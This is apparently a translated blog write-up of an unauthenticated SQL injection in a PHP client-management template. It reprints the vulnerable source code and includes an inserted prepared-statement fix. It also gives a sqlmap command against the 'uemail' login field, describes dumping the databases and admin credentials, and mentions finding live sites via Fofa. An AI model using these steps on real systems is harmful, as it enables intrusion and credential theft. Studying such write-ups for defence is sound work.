
Unauthenticated SQL Injection in Simple Client Management System

2021-07-02 15:10

0x00 Introduction


This seems to be a fairly niche template: a quick Fofa search turns up only a handful of sites running it.

Anyone interested can analyse the source code themselves:

https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip

0x01: Analysis and Reproduction


1. Set it up on an internal network and take a look.

2. The home page is just a login form. Let's look at the code:

<?php
session_start();
require_once('dbconnection.php');

// Code for Registration
if(isset($_POST['signup'])){
    $fname=$_POST['fname'];
    $lname=$_POST['lname'];
    $email=$_POST['email'];
    $password=$_POST['password'];
    $contact=$_POST['contact'];
    $enc_password=md5($password);
    $a=date('Y-m-d');
    // Form fields are concatenated straight into the INSERT with no escaping
    $msg=mysqli_query($con,"insert into users(fname,lname,email,password,contactno,posting_date) values('$fname','$lname','$email','$enc_password','$contact','$a')");
    if($msg){
        echo "<script>alert('Register successfully');</script>";
    }
}

// Code for login system
if(isset($_POST['login'])){
    $password=$_POST['password'];
    $dec_password=md5($password);
    $useremail=$_POST['uemail'];
    // uemail is placed in the query unfiltered: this is the injection point discussed below
    $ret= mysqli_query($con,"SELECT * FROM users WHERE email='$useremail' and password='$dec_password'");
    $num=mysqli_fetch_array($ret);
    if($num>0){
        $extra="welcome.php";
        $_SESSION['login']=$_POST['uemail'];
        $_SESSION['id']=$num['id'];
        $_SESSION['name']=$num['fname'];
        $host=$_SERVER['HTTP_HOST'];
        $uri=rtrim(dirname($_SERVER['PHP_SELF']),'/\\');
        header("location:http://$host$uri/$extra");
        exit();
    }else{
        echo "<script>alert('Invalid username or password');</script>";
        $extra="index.php";
        $host = $_SERVER['HTTP_HOST'];
        $uri = rtrim(dirname($_SERVER['PHP_SELF']),'/\\');
        header("location:http://$host$uri/$extra");
        exit();
    }
}

// Code for Forgot Password
if(isset($_POST['send'])){
    // femail is likewise concatenated into the query without escaping
    $row1=mysqli_query($con,"select email,password from users where email='".$_POST['femail']."'");
    $row2=mysqli_fetch_array($row1);
    if($row2>0){
        $email = $row2['email'];
        $subject = "Information about your password";
        $password=$row2['password'];
        $message = "Your password is ".$password;
        mail($email, $subject, $message, "From: $email");
        echo "<script>alert('Your Password has been sent Successfully');</script>";
    }else{
        echo "<script>alert('Email not register with us');</script>";
    }
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Login System</title>
<link href="css/style.css" rel='stylesheet' type='text/css' />
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="Elegent Tab Forms,Login Forms,Sign up Forms,Registration Forms,News latter Forms,Elements" />
<script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script>
<script src="js/jquery.min.js"></script>
<script src="js/easyResponsiveTabs.js" type="text/javascript"></script>
<script type="text/javascript"> $(document).ready(function () { $('#horizontalTab').easyResponsiveTabs({ type: 'default', width: 'auto', fit: true }); });</script>
<link href='http://fonts.googleapis.com/css?family=Source+Sans+Pro:200,400,600,700,200italic,300italic,400italic,600italic|Lora:400,700,400italic,700italic|Raleway:400,500,300,600,700,200,100' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
</head>
<body>
<div class="main">
  <div class="facts" style="margin-top: 100px;margin-left: 20%;margin-right: 20%;" align="center">
    <div class="login">
      <h2 style="color: #fff;">Users Login here</h2>
      <form name="login" action="" method="post">
        <input type="text" class="text" name="uemail" value="" placeholder="Enter your registered email" ><a href="#" class=" icon email"></a>
        <input type="password" value="" name="password" placeholder="Enter valid password"><a href="#" class=" icon lock"></a>
        <div class="p-container" style="margin-right: 48px;">
          <div class="submit two"> <input type="submit" name="login" value="LOG IN" > </div>
          <div class="clear"> </div>
        </div>
      </form>
    </div>
  </div>
</div>
</body>
</html>

3. Look at the uemail parameter that the login form submits.

There is no filtering here at all; let's trace it through to confirm.
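As an added example (not code from the original application), here is the login handler above rewritten so that uemail is bound as a query parameter instead of being concatenated into the SQL string. It assumes dbconnection.php still supplies a mysqli connection in $con, that mysqlnd is available for get_result(), and that the password column holds password_hash() output rather than the original unsalted MD5.

```php
<?php
// Added example, not the project's code. Hardened replacement for the login block in index.php.
session_start();
require_once('dbconnection.php');   // assumed to define $con (mysqli), as in the original

// Look up a user by email with a prepared statement. The value is sent separately from the
// SQL text, so input like "' or 1=1 -- " is compared as a literal string, never parsed as SQL.
function find_user_by_email(mysqli $con, string $email): ?array
{
    $stmt = $con->prepare('SELECT id, fname, email, password FROM users WHERE email = ? LIMIT 1');
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs the mysqlnd driver
    $stmt->close();
    return $row ?: null;
}

if (isset($_POST['login'])) {
    $email    = (string)($_POST['uemail'] ?? '');
    $password = (string)($_POST['password'] ?? '');

    $user = find_user_by_email($con, $email);

    // The original compares an unsalted MD5 inside the query; here the check is done in PHP
    // with password_verify(), which expects hashes produced by password_hash() at sign-up.
    if ($user !== null && password_verify($password, $user['password'])) {
        session_regenerate_id(true);            // new session id on login, against fixation
        $_SESSION['login'] = $user['email'];
        $_SESSION['id']    = $user['id'];
        $_SESSION['name']  = $user['fname'];
        header('Location: welcome.php');
        exit();
    }

    // One message for both "unknown email" and "wrong password"; it is stored in the session
    // and shown after the redirect, instead of echoing output before header() as the original did.
    $_SESSION['login_error'] = 'Invalid username or password';
    header('Location: index.php');
    exit();
}
```

The same prepare/bind pattern applies to the signup INSERT and the forgot-password SELECT, which concatenate form fields in exactly the same way.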

4. Go straight to the dbconnection.php file.

5. Take another look at the dbconnection.php file.

What???

(cue the coffin dance music)

6. Capture the login request and test it.

7. Run sqlmap against the specified parameter:

sqlmap -r /Users/apple/Desktop/log.log --dbs --random-agent -p uemail --flush-session

Finally, dump the data as a test.

Rule out a false positive.

Confirmed.

Check the privileges.

Check the administrator account and password.


0x02: Summary

1. This template is fairly simple. I'm a newbie too; if the analysis is wrong, please go easy on me.

2. In this era of EXPs flying everywhere, if you really want to learn, you genuinely need to look at how the vulnerability works.

3. I'm a newbie; I only started learning cybersecurity at 1:30:23 this afternoon, so please show me the ropes.



洛米唯熊





点个在看 你最好看




Source: https://mp.weixin.qq.com/s?__biz=MzIzODE0NDc3OQ==&mid=2247485142&idx=1&sn=3ef8d948063b1b8640b20ca715bb330d
